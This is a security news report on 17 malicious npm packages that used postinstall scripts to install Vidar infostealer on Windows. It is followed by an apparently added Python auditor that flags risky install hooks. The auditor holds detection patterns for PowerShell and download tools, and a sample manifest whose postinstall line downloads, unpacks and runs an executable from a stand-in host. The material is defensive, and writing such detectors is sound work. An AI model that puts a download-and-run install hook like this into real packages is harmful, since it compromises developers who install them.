15+ Weaponized Npm Packages Attacking Windows Systems To Deliver...
A sophisticated supply-chain attack has emerged that targets Windows systems through malicious npm packages, exposing a weakness in open-source software distribution.
Between October 21 and 26, 2025, threat actors published 17 malicious npm packages containing 23 releases designed to deliver Vidar infostealer malware.
The campaign exploited the trust developers place in package registries, leveraging legitimate-appearing packages that masqueraded as Telegram bot helpers, icon libraries, and forks of popular projects including Cursor and React.
The attack leveraged two recently created npm accounts, aartje and saliii229911, whose packages were downloaded more than 2,240 times before they were removed from the registry.
This distribution method marks a shift for Vidar, which has historically spread through phishing emails carrying malicious Office documents.
The deceptive packaging and seemingly legitimate functionality allowed the malicious code to spread widely before it was detected.
Datadog Security Labs researchers identified the campaign with their GuardDog static analyzer, which flagged suspicious indicators including postinstall script execution and process spawning.
All of the packages executed the same attack chain through postinstall scripts; some variants embedded PowerShell commands directly in package.json.
The attack chain itself is simple. When a developer installed one of the packages, its postinstall script ran automatically and downloaded an encrypted ZIP archive from bullethost.cloud infrastructure.
The downloader script used hardcoded credentials to extract the archive and retrieve bridle.exe, a Go-compiled Vidar variant not previously seen distributed through npm.
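To make the install-hook behaviour described above auditable before a package runs, here is an added example (not code from the article, Datadog or GuardDog): a small Python auditor that flags npm install-lifecycle scripts which launch PowerShell, fetch remote content, unpack archives or start executables, run over two constructed manifests. The indicator names, the sample manifests and the example.invalid URL are my own assumptions, not values from the campaign.

```python
import json, os, re
# npm lifecycle hooks that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators tuned to the chain described above: a hook that launches PowerShell, fetches something remote, unpacks an archive or starts a binary.
INDICATORS = {
    "powershell": re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I),
    "remote_fetch": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Download(File|String)", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "archive_extract": re.compile(r"Expand-Archive|\bunzip\b|\b7z\b|\btar\b", re.I),
    "spawn_binary": re.compile(r"\.exe\b|Start-Process", re.I),
}

def audit_manifest(manifest: dict) -> list[tuple[str, str]]:
    """Return (hook, indicator) pairs for each install-time script in one package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        findings.append((hook, "install_hook"))  # any install hook deserves a look
        findings.extend((hook, name) for name, pat in INDICATORS.items() if pat.search(cmd))
    return findings

def is_high_risk(findings: list[tuple[str, str]]) -> bool:
    """True when an install hook matched a downloader-style indicator."""
    return any(ind != "install_hook" for _, ind in findings)

def audit_node_modules(root: str) -> dict[str, list[tuple[str, str]]]:
    """Audit every package.json under an installed node_modules tree; keep non-empty results."""
    report = {}
    for dirpath, _, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                findings = audit_manifest(json.load(fh))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep scanning
        if findings:
            report[path] = findings
    return report

# Constructed sample manifests, not the real packages from the campaign.
BENIGN = {"name": "demo-icons", "scripts": {"postinstall": "node scripts/patch-readme.js"}}
MALICIOUS = {"name": "demo-telegram-helper", "scripts": {"postinstall": (
    'powershell -NoProfile -Command "Invoke-WebRequest -Uri https://example.invalid/a.zip -OutFile $env:TEMP\\a.zip; '
    'Expand-Archive $env:TEMP\\a.zip $env:TEMP\\a; Start-Process $env:TEMP\\a\\b.exe"')}}
```

Pair a scan like this with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) so lifecycle hooks never run before they have been reviewed.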
Source: Cybersecurity News